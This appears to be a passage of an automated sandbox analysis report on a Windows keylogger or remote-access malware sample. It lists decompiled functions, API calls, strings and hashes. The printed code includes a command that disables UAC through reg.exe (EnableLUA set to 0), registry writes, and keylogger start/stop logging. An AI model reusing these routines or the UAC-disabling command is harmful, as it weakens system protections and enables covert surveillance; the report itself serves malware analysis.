                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,?,?,00000000,?), ref: 00410EB0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 00410EBA
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 00410ED0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410ED9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EE2
                                          • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EF7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@connectsocket
                                        • String ID:
                                        • API String ID: 2339118965-0
                                        • Opcode ID: 77364c1b16f72e8442b5cf229b6c9932876b50d99ed1b33d7c1a183c2fff5cdd
                                        • Instruction ID: 1193976e1187dff15876f75262123416920ecc17f0a83cfc990a5670802f72a4
                                        • Opcode Fuzzy Hash: 77364c1b16f72e8442b5cf229b6c9932876b50d99ed1b33d7c1a183c2fff5cdd
                                        • Instruction Fuzzy Hash: 1811A772A0021CA7CB00FBA1EC4ACEF776CEA84344704443EFE02E7191DA785948C7E8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 43%
                                        			E00412881(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
                                        				char _v20;
                                        				void* _t15;
                                        				void* _t18;
                                        				signed int _t20;
                                        				void* _t25;
                                        				signed int _t28;
                                        				signed int _t29;
                                        				signed int _t36;
                                        				void* _t46;
                                        				signed int _t57;
                                        				void* _t58;
                                        
                                        				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				_t57 = __eax + 2;
                                        				_t15 = _t57 + _t57;
                                        				L00413E84();
                                        				_t25 = _t15;
                                        				_t28 = _t57;
                                        				_t46 = _t25;
                                        				_t29 = _t28 >> 2;
                                        				_t18 = memset(_t46 + _t29, memset(_t46, 0, _t29 << 2), (_t28 & 0x00000003) << 0);
                                        				_t6 = _t57 - 2; // 0x0
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
                                        				_t58 = _t18;
                                        				_t36 = _t6 >> 2;
                                        				_t20 = memcpy(_t25, _t58, _t36 << 2);
                                        				memcpy(_t58 + _t36 + _t36, _t58, _t20 & 0x00000003);
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t25,  &_a11);
                                        				L00413EBE();
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20, _t25);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _a4;
                                        			}

                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                        • ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                        • ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                        • String ID:
                                        • API String ID: 391609400-0
                                        • Opcode ID: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                        • Instruction ID: aeeabeca61c13fa181a61ba6e56d16b1543aaa328dd705508f0d2aa2ccd85a4a
                                        • Opcode Fuzzy Hash: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                        • Instruction Fuzzy Hash: A50180326005199B8B08EF68EC958EFB7EAFB88255744443EF907C7390DE709A05CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 28%
                                        			E00413B0F() {
                                        				struct tagMSG _v32;
                                        				char _v292;
                                        				int _t15;
                                        
                                        				GetModuleFileNameA(0,  &_v292, 0x104);
                                        				 *0x41c204 = E00413BC8();
                                        				0x41c200->cbSize = 0x58;
                                        				 *0x41c208 = 1;
                                        				 *0x41c210 = 0x401;
                                        				 *0x41c214 = ExtractIconA(0,  &_v292, 0);
                                        				lstrcpynA(0x41c218,  *0x41b160, 0x40);
                                        				 *0x41c20c = 7;
                                        				Shell_NotifyIconA(0, 0x41c200);
                                        				_push(0);
                                        				_push(0);
                                        				_push(0);
                                        				_push( &_v32);
                                        				while(1) {
                                        					_t15 = GetMessageA();
                                        					if(_t15 == 0) {
                                        						break;
                                        					}
                                        					TranslateMessage( &_v32);
                                        					DispatchMessageA( &_v32);
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					_push( &_v32);
                                        				}
                                        				return _t15;
                                        			}

                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00413B29
                                          • Part of subcall function 00413BC8: RegisterClassExA.USER32(00000030), ref: 00413C0E
                                          • Part of subcall function 00413BC8: CreateWindowExA.USER32 ref: 00413C29
                                          • Part of subcall function 00413BC8: GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00413B60
                                        • lstrcpynA.KERNEL32(0041C218,00000040), ref: 00413B78
                                        • Shell_NotifyIconA.SHELL32(00000000,0041C200), ref: 00413B8E
                                        • GetMessageA.USER32 ref: 00413BA1
                                        • TranslateMessage.USER32(?), ref: 00413BAB
                                        • DispatchMessageA.USER32 ref: 00413BB5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                        • String ID:
                                        • API String ID: 1970332568-0
                                        • Opcode ID: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                        • Instruction ID: 0139c5569a5099b89989dc8841d294567b871d20cbef476d366633a748243c7d
                                        • Opcode Fuzzy Hash: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                        • Instruction Fuzzy Hash: DA1121B2841215BBD7109BD1EC4CEDB3BBCEB49351F008166B615D2051D7B89545CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D76
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D8D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405DA1
                                        • UnhookWindowsHookEx.USER32(00000000), ref: 00405DC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventHookLocalTimeUnhookV01@@V10@V10@@Windowsfreemallocsprintf
                                        • String ID: Offline Keylogger Stopped$[INFO]
                                        • API String ID: 2222684746-1731565019
                                        • Opcode ID: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                        • Instruction ID: e64c4fb295ac971b427419d3758f0b97408fd66a05d8179c7aec1af0dcca75a5
                                        • Opcode Fuzzy Hash: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                        • Instruction Fuzzy Hash: 0C01D674910B046BE7107725C84D7FB7EBCDF81750F44846BE842922C1D7B869458FAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 28%
                                        			E0040B708(void* _a4, void* _a8, char* _a12, void* _a16, int _a32) {
                                        				char* _t13;
                                        				long _t15;
                                        				void* _t18;
                                        				int _t19;
                                        				void* _t25;
                                        
                                        				_t13 = RegCreateKeyA(_a4, _a8,  &_a8);
                                        				if(_t13 != 0) {
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					return 0;
                                        				} else {
                                        					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t25, _t18);
                                        					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					_t19 = 0;
                                        					_t15 = RegSetValueExA(_a8, _a12, 0, _a32, _t13, _t13);
                                        					RegCloseKey(_a8);
                                        					if(_t15 == 0) {
                                        						_t19 = 1;
                                        					}
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					return _t19;
                                        				}
                                        			}

                                        APIs
                                        • RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                        • RegSetValueExA.ADVAPI32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                        • RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B76A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                        • String ID:
                                        • API String ID: 2159132150-0
                                        • Opcode ID: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                        • Instruction ID: 9d1a0f58833d5773874e13301f2acc6375a40e0de57f65db8332e1017e2c10e5
                                        • Opcode Fuzzy Hash: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                        • Instruction Fuzzy Hash: C901B67200050DEFCF01AFE0ED998EE7B69FB98355B008135FD1AA6160DB319D24DBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 50%
                                        			E0040A0E1() {
                                        				struct _PROCESS_INFORMATION _v20;
                                        				struct _STARTUPINFOA _v88;
                                        				signed int _t17;
                                        
                                        				_t17 = 0x11;
                                        				memset( &_v88, 0, _t17 << 2);
                                        				_v88.cb = 0x44;
                                        				asm("stosd");
                                        				asm("stosd");
                                        				asm("stosd");
                                        				asm("stosd");
                                        				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                        				CloseHandle(_v20);
                                        				return CloseHandle(_v20.hThread);
                                        			}

                                        APIs
                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,0041BA38,0041BCB0), ref: 0040A11F
                                        • CloseHandle.KERNEL32(?), ref: 0040A12E
                                        • CloseHandle.KERNEL32(?), ref: 0040A133
                                        Strings
                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040A115
                                        • C:\Windows\System32\cmd.exe, xrefs: 0040A11A
                                        • D, xrefs: 0040A0F6
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateProcess
                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                        • API String ID: 2922976086-1747066916
                                        • Opcode ID: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                        • Instruction ID: 0928101be9c5a4b5cd6cbd2924aec545eff454ae04b53be068f3b7a54285d6aa
                                        • Opcode Fuzzy Hash: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                        • Instruction Fuzzy Hash: 5EF054B2A00518BEFB019BE8DC05EFFBB7DE784700F114436FA11F6060D6746D088AA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                        • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 2478582372-0
                                        • Opcode ID: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                        • Instruction ID: 9f96166dac4781290f3bd34c47d79f1531a5159583b3a655759a1da2a24b60ea
                                        • Opcode Fuzzy Hash: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                        • Instruction Fuzzy Hash: 50F0F97590060EEBCF04EFA0DD5D9EE7B78AF84349B008024F90697290DA70AA09CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                        • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                        • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                        • String ID:
                                        • API String ID: 914748455-0
                                        • Opcode ID: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                        • Instruction ID: f669f26280469c21e485b93068b71aa9fa6b13bd9f3a6efc1e343f131735dcea
                                        • Opcode Fuzzy Hash: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                        • Instruction Fuzzy Hash: 08F0A97690450EEBCB04EFA0ED5DDEE7B78EB84305B048065F906972A0DA74AA09CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E00405532(void* __ecx) {
                                        				signed int _t8;
                                        				WCHAR* _t9;
                                        				long _t12;
                                        				void* _t21;
                                        				void* _t22;
                                        				void* _t28;
                                        
                                        				_t8 =  *0x41b988; // 0x0
                                        				_t9 = _t8 |  *0x41b98c;
                                        				_t22 = __ecx;
                                        				if(_t9 != 0) {
                                        					 *((char*)(__ecx + 0x30)) = 0;
                                        					do {
                                        						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        						_t9 = CreateFileW(_t9, 0x80000000, 7, 0, 3, 0x80, 0);
                                        						_t21 = _t9;
                                        						if(_t21 == 0xffffffff) {
                                        							 *((char*)(_t22 + 0x30)) = 0;
                                        						} else {
                                        							_t12 = GetFileSize(_t21, 0);
                                        							_t28 = 0 -  *0x41b98c; // 0x0
                                        							if(_t28 >= 0 && (_t28 > 0 || _t12 >=  *0x41b988)) {
                                        								 *((char*)(_t22 + 0x30)) = 1;
                                        								if( *((intOrPtr*)(_t22 + 0x3c)) != 0) {
                                        									E00405D50(_t22);
                                        								}
                                        								Sleep(0x2710);
                                        							}
                                        							_t9 = CloseHandle(_t21);
                                        						}
                                        					} while ( *((char*)(_t22 + 0x30)) == 1);
                                        					if( *((intOrPtr*)(_t22 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
                                        						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z(_t22 + 0x54);
                                        						return E00405180(_t22);
                                        					}
                                        				}
                                        				return _t9;
                                        			}

                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                        • CreateFileW.KERNEL32(00000000), ref: 00405569
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                        • Sleep.KERNEL32(00002710), ref: 004055A7
                                        • CloseHandle.KERNEL32(00000000), ref: 004055AE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@CloseCreateHandleSizeSleepV01@@
                                        • String ID:
                                        • API String ID: 3524115370-0
                                        • Opcode ID: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                        • Instruction ID: 936fdab3816807404b6184885be68073097791833a96003579df1cad0b33865a
                                        • Opcode Fuzzy Hash: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                        • Instruction Fuzzy Hash: 2B115670181E40BFDB216334AD8C7AB7BA9EB41300F40843BE582936D0C7B868448F1C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E00412DDF(void _a4, void* _a8) {
                                        				struct _OVERLAPPED* _t13;
                                        				void* _t16;
                                        				long _t17;
                                        				void* _t19;
                                        
                                        				_t13 = 0;
                                        				_t19 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
                                        				if(_t19 != 0xffffffff) {
                                        					_t17 = GetFileSize(_t19, 0);
                                        					__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z(_t17, 0, _t16);
                                        					_t8 =  &_a4;
                                        					_a4 = 0;
                                        					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					if(ReadFile(_t19,  &_a4, _t17, _t8, 0) != 0) {
                                        						_t13 = 1;
                                        					}
                                        					CloseHandle(_t19);
                                        					return _t13;
                                        				}
                                        				return 0;
                                        			}

                                        APIs
                                        • CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E0D
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E1A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,?,00409C9F,00000000), ref: 00412E2C
                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E34
                                        • CloseHandle.KERNEL32(00000000,?,00409C9F,00000000), ref: 00412E42
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@CloseCreateHandleReadSize
                                        • String ID:
                                        • API String ID: 2061410294-0
                                        • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                        • Instruction ID: e286a7eceb6258eec42f82ecdc09f82327f8599071822df4e1fbbe5006a6f2d0
                                        • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                        • Instruction Fuzzy Hash: EBF08171241518BFEB125F60EC88FFB7B6CEB867A4F108126FD15D6290CA744E418668
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 71%
                                        			E00413BC8() {
                                        				char _v20;
                                        				struct _WNDCLASSEXA _v68;
                                        				struct HWND__* _t21;
                                        				signed int _t23;
                                        
                                        				_t23 = 0xb;
